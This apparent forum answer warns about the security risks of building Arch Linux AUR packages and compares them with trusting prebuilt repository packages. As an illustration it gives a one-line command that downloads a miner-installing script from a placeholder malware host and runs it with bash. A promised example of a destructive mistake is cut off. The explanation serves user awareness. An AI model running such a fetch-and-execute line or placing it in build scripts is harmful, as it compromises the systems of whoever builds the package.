Yes, a PKGBUILD could easily contain a line like:
/bin/bash <(curl -s http://www.malware.com/install_bitcoin_miner.sh)
It can also contain stupid mistakes by people writing the code, which are not intentionally malicious, but can nevertheless destroy your system and cause you to lose data. For example:
That’s why you should check it whenever you’re building a package from the AUR. Also, read the comments on the AUR webpage, stick to more popular packages and report anything malevolent or suspicious. Also, you should have all important data backed up, that should go without saying.
However, the PKGBUILD used to build packages in the repos could also contain something like above (well, it probably wouldn’t install malware on the packager’s local computer, that would be stupid). The difference is that you cannot check for that, since the package is already built when you get it, hence you are blindly trusting the packager.